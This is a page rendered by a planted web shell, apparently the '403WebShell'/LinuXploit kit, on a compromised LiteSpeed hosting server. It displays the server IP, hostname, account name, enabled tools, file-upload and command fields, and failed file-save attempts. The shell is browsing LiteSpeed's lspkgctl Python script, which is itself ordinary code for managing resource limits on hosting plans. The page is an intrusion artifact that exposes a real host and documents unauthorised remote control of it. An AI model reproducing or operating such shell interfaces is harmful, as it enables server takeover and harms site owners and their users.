Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.97.1
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/usr/local/lsws/lsns/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/local/lsws/lsns/bin//lspkgctl
#!/usr/bin/python3
import argparse
import common
import csv
import errno
import json
import logging
import os
import pwd
import re
import subprocess
import sys
import time
import glob

from stat import *
from subprocess import PIPE

def command_requires_pkg(command):
    return command in ['default', 'list', 'set', 'set-force', 'validate']

def validate_environment():
    common.ls_ok()
    
def init_pgm():
    common.init_logging()
    parser = argparse.ArgumentParser(prog="lspkgctl",
                                     description='LiteSpeed Packages Control Program')
    parser.add_argument("command", type=str, help="The packages command", 
                        choices=['default', 'list', 'list-all', 'set', 'set-force', 'userpkg', 'usersize', 'validate', 'validate-all', 'version'])
    parser.add_argument("pkg", type=str, nargs='*', default=None, help="package name")
    parser.add_argument("--cpu", type=str, help="limit CPU access.  Specify a percentage of a complete core, 100 is 1 complete core.  Default is no limit (-1).")
    parser.add_argument("--io", type=str, help="limit I/O access.  Specify in bytes/sec.  Default is no limit (-1).")
    parser.add_argument("--iops", type=str, help="limit I/O access.  Specify in IOs per second.  Default is no limit (-1).")
    parser.add_argument('-l', '--log', type=int, help='set logging level, 10=Debug, 20=Info, 30=Warning, 40=Error.  Default is Info')
    parser.add_argument("--mem", type=str, help="limit virtual memory access.  Specify in bytes.  Default is no limit (-1).")
    parser.add_argument('-q', '--quiet', action='store_true', help='turns off all logging and only outputs what is requested.')
    parser.add_argument('-s', '--sleep', type=int, default=0, help="number of seconds to pause.  Should only be used when running in the background")
    parser.add_argument("--tasks", type=str, help="limit number of tasks.  Specify a maximum count of tasks that can be started.")
    parser.add_argument("--size", type=str, help="set redis package size.  Default is not defined (-1).")
    parser.add_argument("--user", type=str, help="the user to request the size for.  Required for the commands usersize and userpkg")
    args = parser.parse_args()
    if not args.quiet or args.log != None:
        if args.log != None:
            logging.getLogger().setLevel(args.log)
        else:
            logging.getLogger().setLevel(logging.INFO)
        logging.debug("Entering lspkgctl")

    validate_environment()
    command = args.command
    if command_requires_pkg(command):
        if args.pkg == None:
            common.fatal_error("You must specify a package for the %s command" % command)
    if command == 'version':
        logging.info("Version: %s" % common.VERSION)
        if args.quiet:
            print(common.VERSION)
        sys.exit(0)
    if (command.startswith('set')) and (args.cpu == None and args.io == None and args.iops == None and args.mem == None and args.tasks == None and args.size == None):
        common.fatal_error("You specified command: %s and no qualifier to set with it" % command)
    if (command == 'usersize' or command == 'userpkg') and not args.user:
        common.fatal_error("You must specify a --user with the usersize or userpkg commands")
    if (args.sleep > 0):
        time.sleep(args.sleep)
    return args

def run_program(args, fail_reason = ""):
    logging.debug('run: ' + str(args))
    result = subprocess.run(args, stdout=PIPE, stderr=PIPE)
    if fail_reason != "" and result.returncode == 0:
        common.fatal_error('Expected: ' + args[0] + ' to fail: ' + fail_reason)
    if fail_reason == "" and result.returncode != 0:
        common.fatal_error('Error in running: ' + args[0] + ' errors: ' + result.stdout.decode('utf-8') + ' ' + result.stderr.decode('utf-8'))
    return result.stdout.decode('utf-8')

def initialized_pkg():
    pkg_json = {}
    pkg_json['uids'] = []
    return pkg_json

def read_pkg_sizes():
    pkg_sizes = {}
    try:
        f = open(common.get_package_size_file(), 'r', encoding="utf-8")
    except OSError as err:
        if err.errno == errno.ENOENT:
            logging.debug('File not found: %s' % common.get_package_size_file())
            return pkg_sizes
        logging.warning('Error opening %s: %s - reinitializing' % (common.get_package_size_file(), err.strerror))
        return pkg_sizes
    try:
        reader = csv.reader(f, delimiter=',', quotechar='"')
        for line in reader:
            logging.debug('package: [' + line[0] + ']: ' + line[1])
            pkg_sizes[line[0]] = line[1]
    except Exception as err:
        logging.warning('Error reading %s: %s - reinitialzing' % (common.get_package_size_file(), err))
        return pkg_sizes
    finally:
        f.close()
    return pkg_sizes

def write_pkg_sizes(pkg_sizes):
    try:
        f = open(common.get_package_size_file(), 'w', encoding="utf-8")
    except OSError as err:
        logging.warning('Error opening %s for write: %s' % (common.get_package_size_file(), err.strerror))
        return False
    try:
        writer = csv.writer(f, delimiter=',', quotechar='"')
        for pkg in pkg_sizes:
            logging.debug('package: [' + pkg + ']: ' + pkg_sizes[pkg])
            writer.writerow([pkg, pkg_sizes[pkg]])
    except Exception as err:
        logging.warning('Error writing %s: %s' % (common.get_package_size_file(), err))
        return False
    finally:
        f.close()
    return True

def read_pkg(pkg, pkg_sizes):
    try:
        f = open(common.pkg_to_filename(pkg), 'r', encoding="utf-8")
    except OSError as err:
        if err.errno == errno.ENOENT:
            logging.debug('File not found: %s' % common.pkg_to_filename(pkg))
            return initialized_pkg()
        logging.warning('Error opening %s: %s - reinitializing' % (common.pkg_to_filename(pkg), err.strerror))
        return initialized_pkg()
    try:
        pkg_json = json.load(f)
    except Exception as err:
        logging.warning('Error reading %s: %s - reinitialzing' % (common.pkg_to_filename(pkg), err))
        return initialized_pkg()
    finally:
        f.close()
    if not 'uids' in pkg_json:
        pkg_json['uids'] = []
    pkg_json['uids'].sort()
    if pkg in pkg_sizes:
        pkg_json['size'] = pkg_sizes[pkg]
    return pkg_json

def list_pkg(pkg, pkg_sizes):
    pkg_json = read_pkg(pkg, pkg_sizes)
    return pkg_json

def command_list(args, pkg_sizes, single_list=False):
    pkg_obj = {}
    if single_list or args.command == 'list':
        for pkg in args.pkg:
            pkg_obj[pkg] = list_pkg(pkg, pkg_sizes)
    else:
        pkgs = glob.glob(common.pkg_to_filename('*'))
        for f in pkgs:
            fileonly = os.path.basename(f)
            pkg = fileonly.split('.conf')[0]
            logging.debug('From file: %s, using pkg %s' % (f, pkg))
            pkg_obj[pkg] = list_pkg(pkg, pkg_sizes)
    final_json = {}
    final_json['packages'] = pkg_obj
    print(json.dumps(final_json, indent=4))
    return 0

def plesk_home_dict():
    home_dict = {}
    for user in pwd.getpwall():
        if user.pw_uid >= common.get_min_uid():
            logging.debug('home_dict key: ' + user.pw_dir)
            home_dict[user.pw_dir] = user
    return home_dict

def read_pleskplans():
    home_dict = plesk_home_dict()
    plans = {}
    userplans = {}
    # Thanks to Stas Karpinsky of vangus.co.il for correcting the SQL!
    plan_lines = run_program(['plesk', 'db', \
                              "select sys_users.login, sys_users.home, " + \
                                "Templates.name from sys_users " +  \
                                "join hosting on sys_users.id = hosting.sys_user_id " + \
                                "join domains on hosting.dom_id = domains.id " + \
                                "join Subscriptions on domains.id = Subscriptions.object_id " + \
                                "and Subscriptions.object_type = 'domain' " + \
                                "join PlansSubscriptions on Subscriptions.id = PlansSubscriptions.subscription_id " + \
                                "join Templates on PlansSubscriptions.plan_id = Templates.id"])
    for line in plan_lines.splitlines():
        if line.startswith('+-') or line.startswith('| login'):
            continue
        pat = re.compile( r'\|\s(.*?)\s{1,}\|')
        matches = []
        pos = 0
        while pos < len(line):
            match = pat.search(line, pos)
            if match:
                logging.debug('Appending: %s in %s' % (match[1], line))
                pos = match.start() + 1
                matches.append(match[1])
            else:
                break
        if len(matches) != 3:
            for match in matches:
                logging.debug(match)
            common.fatal_error("Expected 3 matches in %s and got %d" % (line, len(matches)))
        if not matches[1] in home_dict:
            common.fatal_error("%s in user dictionary from %s" % (matches[1], line))
        plan = matches[2]
        user = home_dict[matches[1]]
        logging.debug("   add to %s: %s (%d)" % (plan, user.pw_name, user.pw_uid))
        if not plan in plans:
            plans[plan] = []
        plans[plan].append(user.pw_uid)
        userplans[user.pw_name] = plan
    return plans, userplans

def read_usersplans():
    if common.get_plesk():
        return read_pleskplans()
    plans = {}
    userplans = {}
    planfiles = glob.glob('/var/cpanel/packages/*')
    for planfile in planfiles:
        if os.path.isfile(planfile):
            plan = os.path.basename(planfile)
            plans[plan] = []
            logging.debug("Check package: %s" % plan)
    try:
        f = open('/etc/userplans', 'r', encoding="utf-8")
    except Exception as err:
        common.fatal_error('Error opening /etc/userplans: %s' % err)
    lines = f.readlines()
    for line in lines:
        if line[0] != '#':
            pieces = line.split(': ')
            if len(pieces) == 2:
                pkg = pieces[1].strip(' \n\t')
                user = pieces[0].strip()
                logging.debug('   pkg: %s, user: %s' % (pkg, user))
                if pkg in plans:
                    try:
                        pwd_var = pwd.getpwnam(user)
                    except Exception as err:
                        common.fatal_error("passwd entry error: %s for user %s" % (err, user))
                    plans[pkg].append(pwd_var.pw_uid)
                    userplans[str(pwd_var.pw_name)] = pkg
                    logging.debug("add to %s: %s (%d)" % (pkg, user, pwd_var.pw_uid))
    f.close()
    return plans, userplans
    
def set_users_to_pkg(opt, users, users_vals, org_pkg, pkg_json, force, args_dict):
    if args_dict != None and not opt in args_dict:
        return False
    pkg_jsonInfinite = arrInfinite(opt, pkg_json)
    if pkg_jsonInfinite:
        cgval = '-1'
    else:
        cgval = pkg_json[opt]
    args = [common.get_bin_file('lscgctl'), '--' + opt, cgval, 'set']    
    found_diff = False
    for user in users:
        if not user in pkg_json['uids']:
            do_force = True
        else:
            do_force = force
        if not do_force and not opt_val_eq(opt, users_vals[str(user)], org_pkg):
            if not opt in org_pkg or not opt in users_vals[str(user)]:
                logging.debug('Skip opt %s for %s (not force)' % (opt, str(user)))
            else:
                logging.debug('Skip opt %s for %s (not force: %s != %s)' % (opt, str(user), users_vals[str(user)][opt], org_pkg[opt]))
            continue
        if opt_val_eq(opt, users_vals[str(user)], pkg_json):
            logging.debug('Skip opt %s for %s (already value)' % (opt, str(user)))
            continue
        logging.debug('Use opt %s for user %s' % (opt, str(user)))
        found_diff = True
        args.append(str(user))
    if not found_diff:
        return False
    run_program(args)
    return True

def write_pkg(pkg, pkg_json):
    logging.debug('Write pkg: %s as %s' % (pkg, common.pkg_to_filename(pkg)))
    try:
        f = open(common.pkg_to_filename(pkg), 'w', encoding="utf-8")
    except Exception as err:
        common.fatal_error('Error opening %s for write: %s' % (common.pkg_to_filename(pkg), err))
    for opt in common.get_options():
        if opt in pkg_json and arrInfinite(opt, pkg_json):
            del pkg_json[opt]
    try:
        f.write(json.dumps(pkg_json, indent=4))
    except Exception as err:
        common.fatal_error('Error writing %s: %s' % (common.pkg_to_filename(pkg), err))
    f.close()
    
def revalidate_pkg(pkg, users, users_vals, org_pkg, pkg_json, force, args_dict):
    logging.debug("revalidate_pkg")
    test_users = []
    if force:
        test_users = users
    else:
        for user in users:
            if not str(user) in pkg_json['uids']:
                test_users.append(user)
    updated = False
    for opt in common.get_options():
        if set_users_to_pkg(opt, test_users, users_vals, org_pkg, pkg_json, force, args_dict):
            updated = True
    if not updated:
        if set(users) != set(pkg_json['uids']):
            updated = True
            logging.debug("Changed users, so update pkg")
    if updated or org_pkg != pkg_json:
        pkg_json['uids'] = users
        write_pkg(pkg, pkg_json)

def validate_pkg(pkg, pkg_sizes, users_vals, users):
    pkg_json = read_pkg(pkg, pkg_sizes)
    revalidate_pkg(pkg, users, users_vals, pkg_json, pkg_json, False, None)
    
def command_validate(args, users_vals, usersplans, pkg_sizes):
    if args.command == 'validate-all' or args.command == 'list-all':
        for pkg in usersplans:
            validate_pkg(pkg, pkg_sizes, users_vals, usersplans[pkg])
    else:
        for pkg in args.pkg:
            if not pkg in usersplans:
                common.fatal_error("Specified package: %s not found" % pkg)
            validate_pkg(pkg, pkg_sizes, users_vals, usersplans[pkg])

def arrInfinite(opt, arr):
    return (not opt in arr) or arr[opt] == None or arr[opt] == '' or arr[opt] == '-1'

def opt_val_eq(opt, arr1, arr2):
    arr1Infinite = arrInfinite(opt, arr1)
    arr2Infinite = arrInfinite(opt, arr2)
    if arr1Infinite or arr2Infinite:
        return arr1Infinite == arr2Infinite
    return common.str_num_values(common.int_num_values(arr1[opt])) == common.str_num_values(common.int_num_values(arr2[opt]))

def set_json(args, pkg_json):
    changed = False
    args_dict = vars(args)
    logging.debug('In set_json')
    for opt in common.get_options():
        if not opt_val_eq(opt, args_dict, pkg_json):
            if opt in args_dict and args_dict[opt] != None:
                pkg_json[opt] = args_dict[opt]
                changed = True
            else:
                logging.debug('   not set ' + opt)
        else:
            logging.debug('   equal ' + opt)
    if not changed:
        logging.debug('set_json nothing changed')
    return changed

def get_users_vals():
    pgm_args = [common.get_bin_file('lscgctl'), 'list-all', 'q']    
    out = run_program(pgm_args)
    try:
        users_vals = json.loads(out)
    except Exception as err:
        common.fatal_error('Error parsing user details: %s' % err)
    return users_vals

def deep_copy(pkg, pkg_json, pkg_sizes):
    copy = {}
    for opt in common.get_options():
        if opt in pkg_json:
            copy[opt] = pkg_json[opt]
    if "size" in pkg_sizes:
        copy["size"] = pkg_sizes[pkg]
    return copy

def command_set(args, users_vals, usersplans, pkg_sizes):
    all_users = False
    if 'force' in args.command or 'default' == args.command:
        all_users = True
    write_sizes = False
    for pkg in args.pkg:
        pkg_json = read_pkg(pkg, pkg_sizes)
        org_pkg = deep_copy(pkg, pkg_json, pkg_sizes)
        if 'set' in args.command:
            if args.size != None:
                logging.debug('set for pkg: ' + pkg + ' size: ' + args.size)
                write_sizes = True
                if args.size == '-1': 
                    if pkg in pkg_sizes:
                        del pkg_sizes[pkg]
                else:
                    pkg_sizes[pkg] = args.size;
            if not set_json(args, pkg_json) and not all_users:
                continue
        revalidate_pkg(pkg, usersplans[pkg], users_vals, org_pkg, pkg_json, all_users, vars(args))
    if write_sizes:
        write_pkg_sizes(pkg_sizes)
    return 0

def command_usersize(args, pkg_sizes, userplans):
    rc = 0
    if str(args.user) in userplans:
        if userplans[str(args.user)] in pkg_sizes:
            logging.debug('user: ' + args.user + ' in pkg: ' + userplans[str(args.user)] + ' size: ' + pkg_sizes[userplans[str(args.user)]])
            print(pkg_sizes[userplans[str(args.user)]])
        else:
            logging.debug('user: ' + args.user + ' in pkg: ' + userplans[str(args.user)] + ' BUT HAS NO SIZE')
            sys.exit(1)
    else:
        logging.debug('user: ' + args.user + ' NOT in known packages')
        sys.exit(1)
    return rc

def command_userpkg(args, userplans):
    rc = 0
    if str(args.user) in userplans:
        logging.debug('user: ' + args.user + ' in pkg: ' + userplans[str(args.user)])
        print(userplans[str(args.user)])
    else:
        logging.debug('user: ' + args.user + ' NOT in known packages')
        sys.exit(1)
    return rc

def do_pgm(args):
    logging.debug("Entering lspkgctl, command: %s" % args.command)
    usersplans, uidplans = read_usersplans()
    if 'usersize' == args.command:
        pkg_sizes = read_pkg_sizes()
        ret = command_usersize(args, pkg_sizes, uidplans)
    elif 'userpkg' == args.command:
        ret = command_userpkg(args, uidplans)
    elif 'validate' in args.command or 'list' in args.command:
        pkg_sizes = read_pkg_sizes()
        users_vals = get_users_vals()
        ret = command_validate(args, users_vals, usersplans, pkg_sizes)
        if 'list' in args.command:
            ret = command_list(args, pkg_sizes)
    elif 'set' in args.command or 'default' in args.command:
        pkg_sizes = read_pkg_sizes()
        users_vals = get_users_vals()
        ret = command_set(args, users_vals, usersplans, pkg_sizes)
    else:
        common.fatal_error('Unexpected command: %s' % args.command)
    logging.debug("Exiting lspkgctl")
    return ret

def main():
    args = init_pgm()
    return do_pgm(args)
  
if __name__ == "__main__":
    main()

Youez - 2016 - github.com/yon3zu
LinuXploit